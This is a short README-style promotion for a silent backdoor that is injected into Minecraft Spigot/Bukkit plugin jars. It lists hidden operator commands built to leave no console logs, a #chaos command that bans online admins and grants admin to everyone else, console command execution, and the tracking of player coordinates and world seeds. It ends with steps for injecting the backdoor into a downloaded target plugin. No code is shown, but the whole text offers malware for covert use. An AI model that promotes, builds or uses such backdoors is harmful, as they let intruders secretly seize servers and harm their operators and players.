// Thicc Industries' Silent Spigot Backdoor \\
--- Compatible with all spigot plugins ---
The Thicc Industries' Backdoor is a silent, fully featured backdoor for any spigot / bukkit plugin, as opposed to a simple ForceOP backdoor, the Thicc Industries backdoor includes its own, silent versions of operator commands that do not create any logs in the server console. The backdoor also includes an injector application that can automatically inject the backdoor into any plugin .jar, without the need for any manual modification of plugin source code.
- Silent versions of operator commands to avoid detection.
- Custom commands unavailable to regular operators. (32k items, Ban on behalf of others, Find player coords)
- Fully automated injector.
Default command prefix is #, this can be changed in the injector.
- #op - Give player operator status
- #deop - Remove player's operator status
- #ban - Ban player
- #banip - IP ban player
- #gamemode / gm - Change gamemode
- #give - Give items
- #32k - Enchant item in hand with level 32k enchants.
- #seed - Find world seed
- #coords - Find player coordinates
- #auth - authorize new user
- #deauth - deauthorize user
- #help - List all available commands, with syntax and description.
These commands are noticeable in the server console.
- #exec - Execute a command as the server console. [Visible]
- #chaos - Deop and Ban all ops currently online. Give admin to everyone else. [Visible]
- #tp - Teleport to coordinates [Visible, See below.]
#tp command may produce [Player Name] moved too quickly! warnings in server console. This may also cause anti-cheat plugins to kick you.
How to use:
- Find Minecraft UUID, you can find this on NameMC
- Download desired target plugin jar
- Using the injector, install the backdoor into plugin.